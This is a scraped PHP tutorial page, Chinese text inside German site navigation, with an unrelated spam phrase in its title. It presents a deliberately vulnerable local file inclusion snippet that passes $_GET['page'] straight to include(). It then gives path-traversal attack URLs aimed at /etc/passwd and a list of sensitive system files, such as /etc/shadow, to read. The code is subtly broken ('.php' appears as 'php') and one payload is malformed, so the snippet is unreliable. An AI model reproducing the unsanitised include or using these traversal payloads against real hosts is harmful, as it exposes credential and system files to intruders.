Heim >Backend-Entwicklung >PHP-Tutorial >pimchanok leuwisetpaibul php 伪造本地文件包含漏洞的代码
pimchanok leuwisetpaibul php 伪造本地文件包含漏洞的代码
- WBOYOriginal
- 2016-07-29 08:47:111329Durchsuche
代码:
复制代码 代码如下:
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
以上就介绍了pimchanok leuwisetpaibul php 伪造本地文件包含漏洞的代码,包括了pimchanok leuwisetpaibul方面的内容,希望对PHP教程有兴趣的朋友有所帮助。
Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Vorheriger Artikel:php数组函数序列之array_push 数组尾部添加一个或多个元素(入栈),返回新长度。Nächster Artikel:submithandler PHP中文处理 中文字符串截取mb_substr和获取中文字符串字数
In Verbindung stehende Artikel
Mehr sehen- So verwenden Sie cURL zum Implementieren von Get- und Post-Anfragen in PHP
- So verwenden Sie cURL zum Implementieren von Get- und Post-Anfragen in PHP
- So verwenden Sie cURL zum Implementieren von Get- und Post-Anfragen in PHP
- So verwenden Sie cURL zum Implementieren von Get- und Post-Anfragen in PHP
- Alle Ausdruckssymbole in regulären Ausdrücken (Zusammenfassung)